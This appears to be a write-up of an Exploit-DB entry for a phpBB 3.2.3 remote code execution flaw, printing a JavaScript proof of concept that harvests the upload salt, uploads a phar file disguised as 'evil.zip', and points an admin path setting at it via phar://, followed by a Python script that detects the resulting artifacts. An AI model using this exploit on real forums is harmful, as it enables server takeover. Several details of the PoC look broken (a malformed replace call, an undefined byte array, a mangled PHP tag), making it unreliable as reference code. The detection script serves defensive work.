### Vulnerability Summary

**Vulnerability Overview**

* **Vulnerability Name**: phpBB 3.2.3 - Remote Code Execution (RCE)
* **EDB-ID**: 46512
* **CVE ID**: N/A
* **Author**: ALLYSHKА
* **Type**: WEBAPPS
* **Platform**: PHP
* **Published Date**: 2018-12-12

**Affected Scope**

* **Vulnerable Application**: phpBB 3.2.3 (and potentially subsequent versions, subject to specific patch analysis)

**Remediation**

* The screenshot does not directly provide remediation code. However, it is generally recommended to upgrade phpBB to the latest secure version and remove or patch the relevant logic within the attachment upload functionality.

**Proof of Concept (POC)**

The exploit is a JavaScript snippet that triggers remote code execution by constructing specific requests. The code is split into two parts (interrupted by a cookie popup in the screenshot), with the complete logic as follows:

```javascript
// All greets goes to RIPS Tech
// Run this JS on Attachment Settings ACP page

var plupload_salt = '';
var form_token = '';
var creation_time = '';
var filepath = 'phar://./files/plupload/Salt_aaae9cba3fdadb1f0c3b4934c028d11zip.part';
// md5('evil.zip') = aaae9cba3fdadb1f0c3b4934c028d11zip
var payload = '<php __HALT_COMPILER(); ?'
// ... (contains complex encoded characters in between to construct the payload) ...
// your payload here

var posturl = '/adm/index.php?i=acp_attachments&sid=[EDB_ID]&action=download';
var postdata = {
    'type': 'data',
    'method': 'text',
    'where': 'download',
    'table[]': 'phpbb_config',
    'submit': 'submit',
    'creation_time': creation_time,
    'form_token': form_token
};

$.post(posturl.replace('[', '[', 'sid'), postdata, function(data) {
    plupload_salt = data.match(/plupload_salt\\s*=\s*(['"])(.*?)\1/)[1];
    if (plupload_salt) {
        filepath = filepath.replace('Salt', plupload_salt);
        var postdata = new FormData();
        postdata.append('name', 'evil.zip');
        postdata.append('chunk', 0);
        postdata.append('chunks', 2);
        postdata.append('add_file', 'Add the file');
        postdata.append('real_filename', 'evil.zip');
        // file
        var pharfile = new File(byteArray, 'evil.zip');
        postdata.append('fileupload', pharfile);
        $.ajax({
            url: '/posting.php?mode=reply&f=2&t=1',
            data: postdata,
            cache: false,
            contentType: false,
            processData: false,
            method: 'POST',
            success: function(data) {
                if ('id' in data) {
                    $('#img_magic').val(filepath).focus();
                    $('html, body').animate({
                        scrollTop: $('#submit').offset().top
                    }, 500);
                }
            }
        });
    }
});
```
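For defenders, the two artifacts the PoC leaves behind can be checked on the server: a leftover `.part` chunk under `files/plupload` that contains the `__HALT_COMPILER();` marker, and a path setting whose value starts with a stream wrapper such as `phar://`. The following is an added example, not code from the advisory or from phpBB; the function names, the settings dictionary and its key names are assumptions, and the sample files are constructed and inert.

```python
import os
import re
import tempfile

PHAR_STUB = b"__HALT_COMPILER();"  # marker a phar stub ends with; also opens the PoC payload
WRAPPER_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # phar://, zip://, http://, ...


def find_phar_chunks(upload_dir):
    """Return sorted paths of *.part files under upload_dir that contain a phar stub."""
    hits = []
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            if not name.endswith(".part"):
                continue
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                if PHAR_STUB in fh.read():
                    hits.append(path)
    return sorted(hits)


def suspicious_path_settings(settings):
    """Return names of settings whose value begins with a stream wrapper scheme."""
    return sorted(k for k, v in settings.items() if WRAPPER_RE.match(v or ""))


def build_sample_tree(base):
    """Constructed sample data: one benign chunk and one chunk carrying the marker."""
    plupload = os.path.join(base, "files", "plupload")
    os.makedirs(plupload)
    with open(os.path.join(plupload, "SALT_benign_zip.part"), "wb") as fh:
        fh.write(b"PK\x03\x04 ordinary zip bytes")
    with open(os.path.join(plupload, "SALT_flagged_zip.part"), "wb") as fh:
        fh.write(b"<?php " + PHAR_STUB + b" ?>\r\n(inert placeholder, no archive data)")
    return plupload


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(find_phar_chunks(build_sample_tree(tmp)))
    # Constructed settings; the key names are hypothetical, not phpBB's own.
    print(suspicious_path_settings({
        "image_tool_path": "phar://./files/plupload/SALT_flagged_zip.part",
        "upload_path": "files",
    }))
```

A hit from either check on a forum that has not been upgraded is a reason to review ACP audit logs and recent admin sessions.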